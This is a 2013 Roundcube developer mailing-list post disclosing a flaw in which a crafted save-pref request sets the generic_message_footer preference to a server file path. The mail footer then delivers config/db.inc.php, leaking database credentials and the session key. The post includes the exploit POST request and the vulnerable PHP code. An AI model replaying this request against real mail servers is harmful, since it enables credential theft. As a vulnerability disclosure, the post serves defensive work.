[RCD] zero day vulnerability (tested on v8.0 to 9.0)

Wed, 27 Mar 2013 09:04:58 -0700

Hacker first change value in user preference generic_message_footer to any file allowed to read roundcube (config/db.inc.php config/main.inc.php), after send herself message (with included config file). This allow view session crypto key, and db user and password. If at hosting installed phpmyadmin (mysql) or pgmyadmin (pgsql) and session saved in db, hacker get user mail login and password. 

Finded in Russian tech blog (http://habrahabr.ru/post/174423/).

------


POST /?_task=settings&_action=save-pref&check_request=&_check_request= 
HTTP/1.1" 200 1133 "http://mail.ddos-guard.net/?_task=mail"; "Mozilla/5.0 
(Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0" 
"_token=0f7c9ae8a387cb0bc5ce563fa09fe172&_session=generic_message_footer&_name=generic_message_footer&_value=config/db.inc.php



------

index.php:

else if ($RCMAIL->action == 'save-pref') {
 include INSTALL_PATH . 'program/steps/utils/save_pref.inc';
}


------

program/steps/utils/save_pref.inc:

$name = get_input_value('_name', RCUBE_INPUT_POST);
$value = get_input_value('_value', RCUBE_INPUT_POST);

// save preference value

$RCMAIL->user->save_prefs(array($name => $value));                      
//<--------- rewrite value


// update also session if requested
if ($sessname = get_input_value('_session', RCUBE_INPUT_POST)) {
    // Support multidimensional arrays...
    $vars = explode('/', $sessname);

    // ... up to 3 levels
    if (count($vars) == 1)
        $_SESSION[$vars[0]] = $value;
    else if (count($vars) == 2)
        $_SESSION[$vars[0]][$vars[1]] = $value;
    else if (count($vars) == 3)
        $_SESSION[$vars[0]][$vars[1]][$vars[2]] = $value;
}

$OUTPUT->reset();
$OUTPUT->send();

------

program/steps/mail/sendmail.inc

  // generic footer for all messages
  if ($isHtml && !empty($CONFIG['generic_message_footer_html'])) {

      $footer = 
file_get_contents(realpath($CONFIG['generic_message_footer_html']));     
   //<----- load file from value path
      $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, 
$message_charset);

  }
  else if (!empty($CONFIG['generic_message_footer'])) {

    $footer = 
file_get_contents(realpath($CONFIG['generic_message_footer']));          
     //<----- load file from value path
    $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, 
$message_charset);

    if ($isHtml)
      $footer = '<pre>'.$footer.'</pre>';
  }


--
Sidlyarenko Sergey
https://github.com/lefoyer
_______________________________________________
Roundcube Development discussion mailing list
[email protected]
http://lists.roundcube.net/mailman/listinfo/dev






















					Reply via email to